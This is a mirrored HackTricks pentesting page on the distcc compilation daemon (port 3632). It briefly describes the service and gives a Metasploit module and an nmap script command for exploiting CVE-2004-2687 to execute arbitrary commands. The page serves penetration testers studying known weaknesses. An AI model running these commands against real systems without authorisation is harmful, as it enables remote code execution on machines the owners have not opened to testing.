1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
hacktricks/pentesting/3632-pentesting-distcc.md
2020-10-05 10:16:52 +00:00

1,011 B

3632 - Pentesting distcc

Basic Information

Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed

Default port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

I don't think shodan detects this service.

Resources

Post created by Álex B (@r1p)